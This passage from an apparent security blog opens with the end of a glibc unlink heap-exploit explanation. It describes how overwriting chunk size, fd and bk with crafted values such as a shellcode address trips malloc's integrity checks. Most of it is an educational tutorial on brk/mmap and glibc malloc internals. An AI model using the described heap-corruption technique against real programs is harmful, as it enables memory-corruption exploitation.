        goto errout;
      }
  • Invalid next size: Next chunk size should lie between 8 bytes to arena’s total system memory. When attacker overwrites ‘second’ chunk’s size with -4, ‘glibc malloc’ throws up invalid next size error.
 if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
        || __builtin_expect (nextsize >= av->system_mem, 0))
      {
        errstr = "free(): invalid next size (normal)";
        goto errout;
      }
  • Courrupted Double Linked list: Previous chunk’s fd and next chunk’s bk should point to currently unlinked chunk. When attacker overwrites fd and bk with free -12 and shellcode address, respectively, free and shellcode address + 8 doesnt point to currently unlinked chunk (‘second’). Hence ‘glibc malloc’ throws up corrupted double linked list error.
 if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                     
      malloc_printerr (check_action, "corrupted double-linked list", P);

NOTE: For demo purposes, vulnerable program is compiled without following linux protection mechanisms:

Reference:

Syscalls used by malloc.

Having landed on this page, you should know malloc uses syscalls to obtain memory from the OS. As shown in the below picture malloc invokes either brk or mmap syscall to obtain memory.
brk: brk obtains memory (non zero initialized) from kernel by increasing program break location (brk). Initially start (start_brk) and end of heap segment (brk) would point to same location.

  • When ASLR is turned off, start_brk and brk would point to end of data/bss segment (end_data).
  • When ASLR is turned on, start_brk and brk would be equal to end of data/bss segment (end_data) plus random brk offset.

                       

Above “process virtual memory layout” picture shows start_brk is the beginning of heap segment and brk (program break) is the end of heap segment.

Example:

/* sbrk and brk example */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main()
{
        void *curr_brk, *tmp_brk = NULL;

        printf("Welcome to sbrk example:%d\n", getpid());

        /* sbrk(0) gives current program break location */
        tmp_brk = curr_brk = sbrk(0);
        printf("Program Break Location1:%p\n", curr_brk);
        getchar();

        /* brk(addr) increments/decrements program break location */
        brk(curr_brk+4096);

        curr_brk = sbrk(0);
        printf("Program break Location2:%p\n", curr_brk);
        getchar();

        brk(tmp_brk);

        curr_brk = sbrk(0);
        printf("Program Break Location3:%p\n", curr_brk);
        getchar();

        return 0;
}

Output Analysis:

Before increasing program break: In the below output we can observe there is NO heap segment. Hence

  • start_brk = brk = end_data = 0x804b000.
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$ ./sbrk 
Welcome to sbrk example:6141
Program Break Location1:0x804b000
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$ cat /proc/6141/maps
...
0804a000-0804b000 rw-p 00001000 08:01 539624     /home/sploitfun/ptmalloc.ppt/syscalls/sbrk
b7e21000-b7e22000 rw-p 00000000 00:00 0 
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$

After increasing program break location: In the below output we can observe there is heap segment. Hence

  • start_brk = end_data = 0x804b000
  • brk = 0x804c000.
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$ ./sbrk 
Welcome to sbrk example:6141
Program Break Location1:0x804b000
Program Break Location2:0x804c000
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$ cat /proc/6141/maps
...
0804a000-0804b000 rw-p 00001000 08:01 539624     /home/sploitfun/ptmalloc.ppt/syscalls/sbrk
0804b000-0804c000 rw-p 00000000 00:00 0          [heap]
b7e21000-b7e22000 rw-p 00000000 00:00 0 
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$

where
0804b000-0804c000 is Virtual address range for this segment
rw-p is Flags (Read, Write, NoeXecute, Private)
00000000 is File offset – Since its not mapped from any file, its zero here
00:00 is Major/Minor device number – Since its not mapped from any file, its zero here
0 is Inode number – Since its not mapped from any file, its zero here
[heap] is Heap segment

mmap: malloc uses mmap to create a private anonymous mapping segment. The primary purpose of private anonymous mapping is to allocate new memory (zero filled) and this new memory would be exclusively used by calling process.

Example:

/* Private anonymous mapping example using mmap syscall */
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

void static inline errExit(const char* msg)
{
        printf("%s failed. Exiting the process\n", msg);
        exit(-1);
}

int main()
{
        int ret = -1;
        printf("Welcome to private anonymous mapping example::PID:%d\n", getpid());
        printf("Before mmap\n");
        getchar();
        char* addr = NULL;
        addr = mmap(NULL, (size_t)132*1024, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (addr == MAP_FAILED)
                errExit("mmap");
        printf("After mmap\n");
        getchar();

        /* Unmap mapped region. */
        ret = munmap(addr, (size_t)132*1024);
        if(ret == -1)
                errExit("munmap");
        printf("After munmap\n");
        getchar();
        return 0;
}

Output Analysis:

Before mmap: In the below output we can see only memory mapping segments that belongs to shared libraries libc.so and ld-linux.so

sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$ cat /proc/6067/maps
08048000-08049000 r-xp 00000000 08:01 539691     /home/sploitfun/ptmalloc.ppt/syscalls/mmap
08049000-0804a000 r--p 00000000 08:01 539691     /home/sploitfun/ptmalloc.ppt/syscalls/mmap
0804a000-0804b000 rw-p 00001000 08:01 539691     /home/sploitfun/ptmalloc.ppt/syscalls/mmap
b7e21000-b7e22000 rw-p 00000000 00:00 0 
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$

After mmap: In the below output we can observe that our memory mapping segment (b7e00000 – b7e21000 whose size is 132KB) is combined with already existing memory mapping segment (b7e21000 – b7e22000).

sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$ cat /proc/6067/maps
08048000-08049000 r-xp 00000000 08:01 539691     /home/sploitfun/ptmalloc.ppt/syscalls/mmap
08049000-0804a000 r--p 00000000 08:01 539691     /home/sploitfun/ptmalloc.ppt/syscalls/mmap
0804a000-0804b000 rw-p 00001000 08:01 539691     /home/sploitfun/ptmalloc.ppt/syscalls/mmap
b7e00000-b7e22000 rw-p 00000000 00:00 0 
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$

where
b7e00000-b7e22000 is Virtual address range for this segment
rw-p is Flags (Read, Write, NoeXecute, Private)
00000000 is File offset – Since its not mapped from any file, its zero here
00:00 is Major/Minor device number – Since its not mapped from any file, its zero here
0 is Inode number – Since its not mapped from any file, its zero here

After munmap: In the below output we can see that our memory mapping segment is unmapped ie) its corresponding memory is released to the operating system.

sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$ cat /proc/6067/maps
08048000-08049000 r-xp 00000000 08:01 539691     /home/sploitfun/ptmalloc.ppt/syscalls/mmap
08049000-0804a000 r--p 00000000 08:01 539691     /home/sploitfun/ptmalloc.ppt/syscalls/mmap
0804a000-0804b000 rw-p 00001000 08:01 539691     /home/sploitfun/ptmalloc.ppt/syscalls/mmap
b7e21000-b7e22000 rw-p 00000000 00:00 0 
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/syscalls$

NOTE: In our sample program executions ASLR was turned off.

Reference:

1. Anatomy of a program in memory

Understanding glibc malloc

I always got fascinated by heap memory. Questions such as

How heap memory is obtained from kernel?
How efficiently memory is managed?
Is it managed by kernel or by library or by application itself?
Can heap memory be exploited?

were in my mind for quite some time. But only recently I got time to understand about it. So here I would like to share my fascination turned knowledge!! Out there in the wild, many memory allocators are available:

  • dlmalloc – General purpose allocator
  • ptmalloc2 – glibc
  • jemalloc – FreeBSD and Firefox
  • tcmalloc – Google
  • libumem – Solaris

Every memory allocator claims they are fast, scalable and memory efficient!! But not all allocators can be suited well for our application. Memory hungry application’s performance largely depends on memory allocator performance. In this post, I will only talk about ‘glibc malloc’ memory allocator. In future, I am hoping to cover up other memory allocators. Throughout this post, for better understanding of ‘glibc malloc’, I will link its recent source code. So buckle up, lets get started with glibc malloc!!

Historyptmalloc2 was forked from dlmalloc. After fork, threading support was added to it and got released in 2006. After its official release, ptmalloc2 got integrated into glibc source code. Once its integration, code changes were made directly to glibc malloc source code itself. Hence there could be lot of changes between ptmalloc2 and glibc’s malloc implementation.

System Calls: As seen in this post malloc internally invokes either brk or mmap syscall.

Threading: During early days of linux, dlmalloc was used as the default memory allocator. But later due to ptmalloc2’s threading support, it became the default memory allocator for linux. Threading support helps in improving memory allocator performance and hence application performance. In dlmalloc when two threads call malloc at the same time ONLY one thread can enter the critical section, since freelist data structure is shared among all the available threads. Hence memory allocation takes time in multi threaded applications, resulting in performance degradation. While in ptmalloc2, when two threads call malloc at the same time memory is allocated immediately since each thread maintains a separate heap segment and hence freelist data structures maintaining those heaps are also separate. This act of maintaining separate heap and freelist data structures for each thread is called per thread arena.

Example:

/* Per thread arena example. */
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/types.h>

void* threadFunc(void* arg) {
        printf("Before malloc in thread 1\n");
        getchar();
        char* addr = (char*) malloc(1000);
        printf("After malloc and before free in thread 1\n");
        getchar();
        free(addr);
        printf("After free in thread 1\n");
        getchar();
}

int main() {
        pthread_t t1;
        void* s;
        int ret;
        char* addr;

        printf("Welcome to per thread arena example::%d\n",getpid());
        printf("Before malloc in main thread\n");
        getchar();
        addr = (char*) malloc(1000);
        printf("After malloc and before free in main thread\n");
        getchar();
        free(addr);
        printf("After free in main thread\n");
        getchar();
        ret = pthread_create(&t1, NULL, threadFunc, NULL);
        if(ret)
        {
                printf("Thread creation error\n");
                return -1;
        }
        ret = pthread_join(t1, &s);
        if(ret)
        {
                printf("Thread join error\n");
                return -1;
        }
        return 0;
}

Output Analysis:

Before malloc in main thread: In the below output we can see that there is NO heap segment yet and no per thread stack too since thread1 is not yet created.

sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ ./mthread 
Welcome to per thread arena example::6501
Before malloc in main thread
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ cat /proc/6501/maps
08048000-08049000 r-xp 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
08049000-0804a000 r--p 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804a000-0804b000 rw-p 00001000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
b7e05000-b7e07000 rw-p 00000000 00:00 0 
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$

After malloc in main thread: In the below output we can see that heap segment is created and its lies just above the data segment (0804b000-0806c000), this shows heap memory is created by increasing program break location ( ie) using brk syscall). Also do note that eventhough user requested only 1000 bytes, heap memory of size 132 KB is created. This contiguous region of heap memory is called arena. Since this arena is created by main thread its called main arena. Further allocation requests keeps using this arena until it runs out of free space. When arena runs out of free space, it can grow by increasing program break location (After growing top chunk’s size is adjusted to include the extra space). Similarly arena can also shrink when there is lot of free space on top chunk.

NOTE: Top chunk is the top most chunk of an arena. For further details about it, see “Top Chunk” section below.

sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ ./mthread 
Welcome to per thread arena example::6501
Before malloc in main thread
After malloc and before free in main thread
...
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/ptmalloc.ppt/mthread$ cat /proc/6501/maps
08048000-08049000 r-xp 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
08049000-0804a000 r--p 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804a000-0804b000 rw-p 00001000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804b000-0806c000 rw-p 00000000 00:00 0          [heap]
b7e05000-b7e07000 rw-p 00000000 00:00 0 
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$

After free in main thread: In the below output we can see that when allocated memory region is freed, memory behind it doesnt get released to the operating system immediately. Allocated memory region (of size 1000 bytes) is released only to ‘glibc malloc’ library, which adds this freed block to main arenas bin (In glibc malloc, freelist datastructures are referred as bins). Later when user requests memory, ‘glibc malloc’ doesnt get new heap memory from kernel, instead it will try to find a free block in bin. And only when no free block exists, it obtains memory from kernel.

sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ ./mthread 
Welcome to per thread arena example::6501
Before malloc in main thread
After malloc and before free in main thread
After free in main thread
...
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/ptmalloc.ppt/mthread$ cat /proc/6501/maps
08048000-08049000 r-xp 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
08049000-0804a000 r--p 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804a000-0804b000 rw-p 00001000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804b000-0806c000 rw-p 00000000 00:00 0          [heap]
b7e05000-b7e07000 rw-p 00000000 00:00 0 
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$

Before malloc in thread1: In the below output we can see that there is NO thread1 heap segment but now thread1’s per thread stack is created.

sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ ./mthread 
Welcome to per thread arena example::6501
Before malloc in main thread
After malloc and before free in main thread
After free in main thread
Before malloc in thread 1
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ cat /proc/6501/maps
08048000-08049000 r-xp 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
08049000-0804a000 r--p 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804a000-0804b000 rw-p 00001000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804b000-0806c000 rw-p 00000000 00:00 0          [heap]
b7604000-b7605000 ---p 00000000 00:00 0 
b7605000-b7e07000 rw-p 00000000 00:00 0          [stack:6594]
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$

After malloc in thread1: In the below output we can see that thread1’s heap segment is created. And its lies in memory mapping segment region (b7500000-b7521000 whose size is 132 KB) and hence this shows heap memory is created using mmap syscall unlike main thread (which uses sbrk). Again here, eventhough user requested only 1000 bytes, heap memory of size 1 MB is mapped to process address space. Out of these 1 MB, only for 132KB read-write permission is set and this becomes the heap memory for this thread. This contiguous region of memory (132 KB) is called thread arena.

NOTE: When user request size is more than 128 KB ( lets say malloc(132*1024)) and when there is not enough space in an arena to satisfy user request, memory is allocated using mmap syscall (and NOT using sbrk) irrespective of whether a request is made from main arena or thread arena.

sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ ./mthread 
Welcome to per thread arena example::6501
Before malloc in main thread
After malloc and before free in main thread
After free in main thread
Before malloc in thread 1
After malloc and before free in thread 1
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ cat /proc/6501/maps
08048000-08049000 r-xp 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
08049000-0804a000 r--p 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804a000-0804b000 rw-p 00001000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804b000-0806c000 rw-p 00000000 00:00 0          [heap]
b7500000-b7521000 rw-p 00000000 00:00 0 
b7521000-b7600000 ---p 00000000 00:00 0 
b7604000-b7605000 ---p 00000000 00:00 0 
b7605000-b7e07000 rw-p 00000000 00:00 0          [stack:6594]
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$

After free in thread1: In the below output we can see that freeing allocated memory region doesnt release heap memory to the operating system. Instead allocated memory region (of size 1000 bytes) is released to ‘glibc malloc’, which adds this freed block to its thread arenas bin.

sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ ./mthread 
Welcome to per thread arena example::6501
Before malloc in main thread
After malloc and before free in main thread
After free in main thread
Before malloc in thread 1
After malloc and before free in thread 1
After free in thread 1
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$ cat /proc/6501/maps
08048000-08049000 r-xp 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
08049000-0804a000 r--p 00000000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804a000-0804b000 rw-p 00001000 08:01 539625     /home/sploitfun/ptmalloc.ppt/mthread/mthread
0804b000-0806c000 rw-p 00000000 00:00 0          [heap]
b7500000-b7521000 rw-p 00000000 00:00 0 
b7521000-b7600000 ---p 00000000 00:00 0 
b7604000-b7605000 ---p 00000000 00:00 0 
b7605000-b7e07000 rw-p 00000000 00:00 0          [stack:6594]
...
sploitfun@sploitfun-VirtualBox:~/ptmalloc.ppt/mthread$

Arena:

Number of arena’s: In above example, we saw main thread contains main arena and thread 1 contains its own thread arena. So can there be a one to one mapping between threads and arena, irrespective of number of threads? Certainly not. An insane application can contain more number of threads (than number of cores), in such a case, having one arena per thread becomes bit expensive and useless. Hence for this reason, application’s arena limit is based on number of cores present in the system.

For 32 bit systems:
     Number of arena = 2 * number of cores.
For 64 bit systems:
     Number of arena = 8 * number of cores.

Multiple Arena:

Example: Lets say a multithreaded application (4 threads – Main thread + 3 user threads) runs on a 32 bit system which contains 1 core. Here no of threads (4) > 2*no of cores (2). Hence in such a case, ‘glibc malloc’ makes sure that multiple arenas are shared among all available threads. But how its shared?

  • When main thread, calls malloc for the first time already created main arena is used without any contention.
  • When thread 1 and thread 2 calls malloc for the first time, a new arena is created for them and its used without any contention. Until this point threads and arena have one-to-one mapping.
  • When thread 3 calls malloc for the first time, number of arena limit is calculated. Here arena limit is crossed, hence try reusing existing arena’s (Main arena or Arena 1 or Arena 2)
  •  Reuse:
    • Once loop over the available arenas, while looping try to lock that arena.
    • If locked successfully (lets say main arena is locked successfully), return that arena to the user.
    • If no arena is found free, block for the arena next in line.
  • Now when thread 3 calls malloc (second time), malloc will try to use last accessed arena (main arena). If main arena is free its used else thread3 is blocked until main arena gets freed. Thus now main arena is shared among main thread and thread 3.

Multiple Heaps:

Primarily below three datastructures are found in ‘glibc malloc’ source code:

heap_info – Heap Header – A single thread arena can have multiple heaps. Each heap has its own header. Why multiple heaps needed? To begin with every thread arena contains ONLY one heap, but when this heap segment runs out of space, new heap (non contiguous region) gets mmap’d to this arena.
malloc_state – Arena Header – A single thread arena can have multiple heaps, but for all those heaps only a single arena header exists. Arena header contains information about bins, top chunk, last remainder chunk…
malloc_chunk – Chunk Header – A heap is divided into many chunks based on user requests. Each of those chunks has its own chunk header.

NOTE:

  • Main arena dont have multiple heaps and hence no heap_info structure. When main arena runs out of space, sbrk’d heap segment is extended (contiguous region) until it bumps into memory mapping segment.
  • Unlike thread arena, main arena’s arena header isnt part of sbrk’d heap segment. Its a global variable and hence its found in libc.so’s data segment.

Pictorial view of main arena and thread arena (single heap segment):

Pictorial view of thread arena (multiple heap segment’s):

Chunk: A chunk found inside a heap segment can be one of the below types:

  • Allocated chunk
  • Free chunk
  • Top chunk
  • Last Remainder chunk

Allocated chunk:

prev_size: If the previous chunk is free, this field contains the size of previous chunk. Else if previous chunk is allocated, this field contains previous chunk’s user data.
size: This field contains the size of this allocated chunk. Last 3 bits of this field contains flag information.

  • PREV_INUSE (P) – This bit is set when previous chunk is allocated.
  • IS_MMAPPED (M) – This bit is set when chunk is mmap’d.
  • NON_MAIN_ARENA (N) – This bit is set when this chunk belongs to a thread arena.

NOTE:

  • Other fields of malloc_chunk (like fd, bk) is NOT used for allocated chunk. Hence in place of these fields user data is stored.
  • User requested size is converted into usable size (internal representation size) since some extra space is needed for storing malloc_chunk and also for alignment purposes. Conversion takes place in such a way that last 3 bits of usable size is never set and hence its used for storing flag information.

Free Chunk:

prev_size: No two free chunks can be adjacent together. When both the chunks are free, its gets combined into one single free chunk. Hence always previous chunk to this freed chunk would be allocated and therefore prev_size contains previous chunk’s user data.
size: This field contains the size of this free chunk.
fd: Forward pointer – Points to next chunk in the same bin (and NOT to the next chunk present in physical memory).
bk: Backward pointer – Points to previous chunk in the same bin (and NOT to the previous chunk present in physical memory).

Bins: Bins are the freelist datastructures. They are used to hold free chunks. Based on chunk sizes, different bins are available:

  • Fast bin
  • Unsorted bin
  • Small bin
  • Large bin

Datastructures used to hold these bins are:

fastbinsY: This array hold fast bins.
bins: This array hold unsorted, small and large bins. Totally there are 126 bins and its divided as follows:

  • Bin 1 – Unsorted bin
  • Bin 2 to Bin 63 – Small bin
  • Bin 64 to Bin 126 – Large bin

Fast Bin: Chunks of size 16 to 80 bytes is called a fast chunk. Bins holding fast chunks are called fast bins. Among all the bins, fast bins are faster in memory allocation and deallocation.

  • Number of bins – 10
    • Each fast bin contains a single linked list (a.k.a binlist) of free chunks. Single linked list is used since in fast bins chunks are not removed from the middle of the list. Both addition and deletion happens at the front end of the list – LIFO.
  • Chunk size – 8 bytes apart
    • Fast bins contain a binlist of chunks whose sizes are 8 bytes apart. ie) First fast bin (index 0) contains binlist of chunks of size 16 bytes, second fast bin (index 1) contains binlist of chunks of size  24 bytes and so on…
    • Chunks inside a particular fast bin are of same sizes.
  • During malloc initialization, maximum fast bin size is set to 64 (!80) bytes. Hence by default chunks of size 16 to 64 is categorized as fast chunks.
  • No Coalescing – Two chunks which are free can be adjacent to each other, it doesnt get combined into single free chunk. No coalescing could result in external fragmentation but it speeds up free!!
  • malloc(fast chunk) –
  • free(fast chunk) –

Unsorted Bin: When small or large chunk gets freed instead of adding them in to their respective bins, its gets added into unsorted bin. This approach gives ‘glibc malloc’ a second chance to reuse the recently freed chunks. Hence memory allocation and deallocation speeds up a bit (because of unsorted bin) since time taken to look for appropriate bin is eliminated.

  • Number of bins – 1
    • Unsorted bin contains a circular double linked list (a.k.a binlist) of free chunks.
  • Chunk size – There is no size restriction, chunks of any size belongs to this bin.

Small Bin: Chunks of size less than 512 bytes is called as small chunk. Bins holding small chunks are called small bins. Small bins are faster than large bins (but slower than fast bins) in memory allocation and deallocation.

  • Number of bins – 62
    • Each small bin contains a circular double linked list (a.k.a binlist) of free chunks. Double linked list is used since in small bins chunks are unlinked from the middle of the list. Here addition happens at the front end and deletion happens at the rear end of the list – FIFO.
  • Chunk Size – 8 bytes apart
    • Small bin contains a binlist of chunks whose sizes are 8 bytes apart. ie) First Small bin (Bin 2) contains binlist of chunks of size 16 bytes, second small bin (Bin 3) contains binlist of chunks of size 24 bytes and so on…
    • Chunks inside a small bin are of same sizes and hence it doesnt need to be sorted.
  • Coalescing – Two chunks which are free cant be adjacent to each other, it gets combined into single free chunk. Coalescing eliminates external fragmentation but it slows up free!!
  • malloc(small chunk) –
    • Initially all small bins would be NULL and hence eventhough user requested a small chunk, instead of small bin codeunsorted bin code tries to service it.
    • Also during the first call to malloc, small bin and large bin datastructures (bins) found in malloc_state is initialized ie) bins would point to itself signifying they are empty.
    • Later when small bin is non empty, last chunk from its corresponding binlist is removed and returned to the user.
  • free(small chunk) –
    • While freeing this chunk, check if its previous or next chunk is free, if so coalesce ie) unlink those chunks from their respective linked lists and then add the new consolidated chunk into the beginning of unsorted bin’s linked list.

Large Bin: Chunks of size greater than equal to 512 is called a large chunk. Bins holding large chunks are called large bins. Large bins are slower than small bins in memory allocation and deallocation.

  • Number of bins – 63
    • Each large bin contains a circular double linked list (a.k.a binlist) of free chunks. Double linked list is used since in large bins chunks are added and removed at any position (front or middle or rear).
    • Out of these 63 bins:
      • 32 bins contain binlist of chunks of size which are 64 bytes apart. ie) First large bin (Bin 65) contains binlist of chunks of size 512 bytes to 568 bytes, second large bin (Bin 66) contains binlist of chunks of size 576 bytes to 632 bytes and so on…
      • 16 bins contain binlist of chunks of size which are 512 bytes apart.
      • 8 bins contain binlist of chunks of size which are 4096 bytes apart.
      • 4 bins contain binlist of chunks of size which are 32768 bytes apart.
      • 2 bins contain binlist of chunks of size which are 262144 bytes apart.
      • 1 bin contains a chunk of remaining size.
    • Unlike small bin, chunks inside a large bin are NOT of same size. Hence they are stored in decreasing order. Largest chunk is stored in the front end while the smallest chunk is stored in the rear end of its binlist.
  • Coalescing – Two chunks which are free cant be adjacent to each other, it gets combined into single free chunk.
  • malloc(large chunk) –
  • free(large chunk) – Its procedure is similar to free(small chunk).

Top Chunk: Chunk which is at the top border of an arena is called top chunk. It doesnt belong to any bin. Top chunk is used to service user request when there is NO free blocks, in any of the bins. If top chunk size is greater than user requested size top chunk is split into two:

  • User chunk (of user requested size)
  • Remainder chunk (of remaining size)

The remainder chunk becomes the new top. If top chunk size is lesser than user requested size, top chunk is extended using sbrk (main arena) or mmap (thread arena) syscall.

Last Remainder Chunk: Remainder from the most recent split of a small request. Last remainder chunk helps to improve locality of reference ie) consecutive malloc request of small chunks might end up being allocated close to each other.

But out of the many chunks available in an arena, which chunk qualifies to be last remainder chunk?

When a user request of small chunk, cannot be served by a small bin and unsorted bin, binmaps are scanned to find next largest (non empty) bin. As said earlier, on finding the next largest (non empty) bin, its split into two, user chunk gets returned to the user and remainder chunk gets added to the unsorted bin. In addition to it, it becomes the new last remainder chunk.

How locality of reference is achieved?

Now when user subsequently request’s a small chunk and if the last remainder chunk is the only chunk in unsorted bin, last remainder chunk is split into two, user chunk gets returned to the user and remainder chunk gets added to the unsorted bin. In addition to it, it becomes the new last remainder chunk. Thus subsequent memory allocations end up being next to each other.